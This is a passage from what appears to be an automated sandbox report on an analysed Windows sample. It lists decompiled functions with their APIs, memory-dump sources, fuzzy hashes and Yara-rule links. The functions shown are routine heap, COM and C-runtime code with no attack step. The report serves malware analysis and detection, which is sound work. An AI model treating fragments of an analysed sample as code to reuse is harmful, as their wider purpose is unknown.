                                                                                                                                                                                                                                0x00a85bfb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85ba8
                                                                                                                                                                                                                                0x00a85bae
                                                                                                                                                                                                                                0x00a85bb6
                                                                                                                                                                                                                                0x00a85be7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85bb8
                                                                                                                                                                                                                                0x00a85bb8
                                                                                                                                                                                                                                0x00a85bc2
                                                                                                                                                                                                                                0x00a85bc6
                                                                                                                                                                                                                                0x00a85bcf
                                                                                                                                                                                                                                0x00a85bd7
                                                                                                                                                                                                                                0x00a85c05
                                                                                                                                                                                                                                0x00a85bd9
                                                                                                                                                                                                                                0x00a85bd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a85bd9
                                                                                                                                                                                                                                0x00a85bd7
                                                                                                                                                                                                                                0x00a85bc2
                                                                                                                                                                                                                                0x00a85c08
                                                                                                                                                                                                                                0x00a85c0f
                                                                                                                                                                                                                                0x00a85c0f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A85BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00A8A77A,00000000,?,?), ref: 00A85BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 18f25ec8aed937d6ca185f56c2a3f972431b3b46c96a4649a87faff525abe0c6
                                                                                                                                                                                                                                • Instruction ID: f1b5abf401c767ec980a50f55c9433aeb57fe2855c1cc55a43e2b98506f92e48
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18f25ec8aed937d6ca185f56c2a3f972431b3b46c96a4649a87faff525abe0c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62014C75D04608FBDF10EFEADC88E9EBFB8EB94750F208066E901E2150D6708A44DF61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A853BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A853BB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xa8d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x00a853c7
                                                                                                                                                                                                                                0x00a853cd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: fc2f31d0a8295b82263efa51a9b9a51cdfc78d588ffc7e3ff4a3329b49d6c07f
                                                                                                                                                                                                                                • Instruction ID: ea5049af5ff137d82024665515151d688e13b65f52746fa55196000f99a92618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc2f31d0a8295b82263efa51a9b9a51cdfc78d588ffc7e3ff4a3329b49d6c07f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BB012F1100100EBCE21CBD0DF04F05BB31B750750F004012B344040B0C2314422FF25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86B85, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E00A86B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00A84A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xa8d2e0; // 0x105a5a8
						_t20 = _t68 + 0xa8e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00A85626(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                0x00a86b8b
                                                                                                                                                                                                                                0x00a86b8e
                                                                                                                                                                                                                                0x00a86b9e
                                                                                                                                                                                                                                0x00a86ba7
                                                                                                                                                                                                                                0x00a86bab
                                                                                                                                                                                                                                0x00a86c79
                                                                                                                                                                                                                                0x00a86c7f
                                                                                                                                                                                                                                0x00a86c7f
                                                                                                                                                                                                                                0x00a86bc5
                                                                                                                                                                                                                                0x00a86bca
                                                                                                                                                                                                                                0x00a86bce
                                                                                                                                                                                                                                0x00a86bd4
                                                                                                                                                                                                                                0x00a86bd9
                                                                                                                                                                                                                                0x00a86be0
                                                                                                                                                                                                                                0x00a86bef
                                                                                                                                                                                                                                0x00a86bef
                                                                                                                                                                                                                                0x00a86bf3
                                                                                                                                                                                                                                0x00a86bf5
                                                                                                                                                                                                                                0x00a86c01
                                                                                                                                                                                                                                0x00a86c0c
                                                                                                                                                                                                                                0x00a86c17
                                                                                                                                                                                                                                0x00a86c1b
                                                                                                                                                                                                                                0x00a86c25
                                                                                                                                                                                                                                0x00a86c29
                                                                                                                                                                                                                                0x00a86c2b
                                                                                                                                                                                                                                0x00a86c30
                                                                                                                                                                                                                                0x00a86c37
                                                                                                                                                                                                                                0x00a86c47
                                                                                                                                                                                                                                0x00a86c47
                                                                                                                                                                                                                                0x00a86c30
                                                                                                                                                                                                                                0x00a86c29
                                                                                                                                                                                                                                0x00a86c49
                                                                                                                                                                                                                                0x00a86c4e
                                                                                                                                                                                                                                0x00a86c53
                                                                                                                                                                                                                                0x00a86c53
                                                                                                                                                                                                                                0x00a86c56
                                                                                                                                                                                                                                0x00a86c5f
                                                                                                                                                                                                                                0x00a86c64
                                                                                                                                                                                                                                0x00a86c64
                                                                                                                                                                                                                                0x00a86c69
                                                                                                                                                                                                                                0x00a86c6e
                                                                                                                                                                                                                                0x00a86c6e
                                                                                                                                                                                                                                0x00a86c69
                                                                                                                                                                                                                                0x00a86bf3
                                                                                                                                                                                                                                0x00a86c70
                                                                                                                                                                                                                                0x00a86c76
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A84A6A: SysAllocString.OLEAUT32(80000002), ref: 00A84AC7
                                                                                                                                                                                                                                  • Part of subcall function 00A84A6A: SysFreeString.OLEAUT32(00000000), ref: 00A84B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A86C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00A848F5), ref: 00A86C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: f8f87b2c21f4dfcf0d4699dc587ea6fb55f684a14e2d7a287d3196a163dbb2bc
                                                                                                                                                                                                                                • Instruction ID: d5a6e2761a40c687542d653def297081dd9a73561b17641cd5b5095079f67a6d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f87b2c21f4dfcf0d4699dc587ea6fb55f684a14e2d7a287d3196a163dbb2bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D53149B2900119EFDB15EFA9CD88C9BBB79FFC97407144658F8459B220E632DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6F04, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736D6F04(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E736D7870(__ebx, __edi, __esi);
				_t43 = E736D754E(__ecx, __edx, 0); // executed
				_t90 = 0x736e99e8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E736D7453();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x736ef460;
					if( *0x736ef460 != 0) {
						E736D76ED(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x736e9a08);
						E736D7870(1, __edi, __esi);
						_t48 =  *0x736ef120; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x736ef120 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E736D7453();
							 *(_t123 - 4) = 1;
							__eflags =  *0x736ef460 - 2;
							if( *0x736ef460 != 2) {
								E736D76ED(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x736e9a30);
								E736D7870(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E736D71C6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x736ef120 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E736D751E(1, _t90, 1, _t113);
								E736D73DA();
								E736D783C();
								 *0x736ef460 =  *0x736ef460 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E736D70A0();
								_t67 = E736D76BF( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E736D70AD();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x736ef460 = 1;
						if(E736D74B0(_t132) != 0) {
							E736D73CE(E736D7810());
							E736D73F2();
							_t80 = E736D8A97(0x736e1114, 0x736e1124);
							_pop(_t102);
							if(_t80 == 0 && E736D7485(1, _t102) != 0) {
								E736D8A50(_t102, 0x736e1108, 0x736e1110);
								 *0x736ef460 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E736D6FE7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E736D76E7();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E736D760E(_t85, _t106, _t121, _t138) != 0) {
									 *0x736e1104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x736ef120 =  *0x736ef120 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}




















                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f0b
                                                                                                                                                                                                                                0x736d6f12
                                                                                                                                                                                                                                0x736d6f17
                                                                                                                                                                                                                                0x736d6f1a
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6f20
                                                                                                                                                                                                                                0x736d6f25
                                                                                                                                                                                                                                0x736d6f28
                                                                                                                                                                                                                                0x736d6f2a
                                                                                                                                                                                                                                0x736d6f2d
                                                                                                                                                                                                                                0x736d6f31
                                                                                                                                                                                                                                0x736d6f38
                                                                                                                                                                                                                                0x736d7005
                                                                                                                                                                                                                                0x736d700a
                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700d
                                                                                                                                                                                                                                0x736d7012
                                                                                                                                                                                                                                0x736d7017
                                                                                                                                                                                                                                0x736d701c
                                                                                                                                                                                                                                0x736d701e
                                                                                                                                                                                                                                0x736d7025
                                                                                                                                                                                                                                0x736d702d
                                                                                                                                                                                                                                0x736d7030
                                                                                                                                                                                                                                0x736d7039
                                                                                                                                                                                                                                0x736d703c
                                                                                                                                                                                                                                0x736d703f
                                                                                                                                                                                                                                0x736d7046
                                                                                                                                                                                                                                0x736d70b5
                                                                                                                                                                                                                                0x736d70ba
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70ca
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f4f
                                                                                                                                                                                                                                0x736d6f56
                                                                                                                                                                                                                                0x736d6f5b
                                                                                                                                                                                                                                0x736d6f6a
                                                                                                                                                                                                                                0x736d6f70
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f88
                                                                                                                                                                                                                                0x736d6f8f
                                                                                                                                                                                                                                0x736d6f99
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f9e
                                                                                                                                                                                                                                0x736d6fa5
                                                                                                                                                                                                                                0x736d6fac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6fae
                                                                                                                                                                                                                                0x736d6fb3
                                                                                                                                                                                                                                0x736d6fb5
                                                                                                                                                                                                                                0x736d6fb8
                                                                                                                                                                                                                                0x736d6fba
                                                                                                                                                                                                                                0x736d6fc3
                                                                                                                                                                                                                                0x736d6fd1
                                                                                                                                                                                                                                0x736d6fd7
                                                                                                                                                                                                                                0x736d6fd7
                                                                                                                                                                                                                                0x736d6fc3
                                                                                                                                                                                                                                0x736d6fd9
                                                                                                                                                                                                                                0x736d6fe1
                                                                                                                                                                                                                                0x736d6fe1
                                                                                                                                                                                                                                0x736d6ff3
                                                                                                                                                                                                                                0x736d6ff6
                                                                                                                                                                                                                                0x736d7002
                                                                                                                                                                                                                                0x736d7002
                                                                                                                                                                                                                                0x736d6f38

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D6F51
                                                                                                                                                                                                                                  • Part of subcall function 736D73CE: InitializeSListHead.KERNEL32(736EF448,736D6F5B,736E99E8,00000010,736D6EEC,?,?,?,736D7114,?,00000001,?,?,00000001,?,736E9A30), ref: 736D73D3
                                                                                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 736D6FBB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3231365870-0
                                                                                                                                                                                                                                • Opcode ID: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction ID: 1c5554c09717eb42efe43cba12dfe30ed7c7a9443ed4e3c542d528e0cf00d5be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 582135366A9B049FEF01AFB8C9043DC3BA2AF01229F540459D8866F0C2DF315048CA6B
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DB824, Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                			E736DB824() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x736ef800 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x736efb04; // 0x94aab8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                                                                                                                                                                                                0x736db829
                                                                                                                                                                                                                                0x736db82b
                                                                                                                                                                                                                                0x736db82f
                                                                                                                                                                                                                                0x736db838
                                                                                                                                                                                                                                0x736db843
                                                                                                                                                                                                                                0x736db853
                                                                                                                                                                                                                                0x736db857
                                                                                                                                                                                                                                0x736db85a
                                                                                                                                                                                                                                0x736db86c
                                                                                                                                                                                                                                0x736db85c
                                                                                                                                                                                                                                0x736db85f
                                                                                                                                                                                                                                0x736db868
                                                                                                                                                                                                                                0x736db861
                                                                                                                                                                                                                                0x736db864
                                                                                                                                                                                                                                0x736db864
                                                                                                                                                                                                                                0x736db85f
                                                                                                                                                                                                                                0x736db86e
                                                                                                                                                                                                                                0x736db876
                                                                                                                                                                                                                                0x736db87b
                                                                                                                                                                                                                                0x736db88a
                                                                                                                                                                                                                                0x736db881
                                                                                                                                                                                                                                0x736db882
                                                                                                                                                                                                                                0x736db882
                                                                                                                                                                                                                                0x736db88e
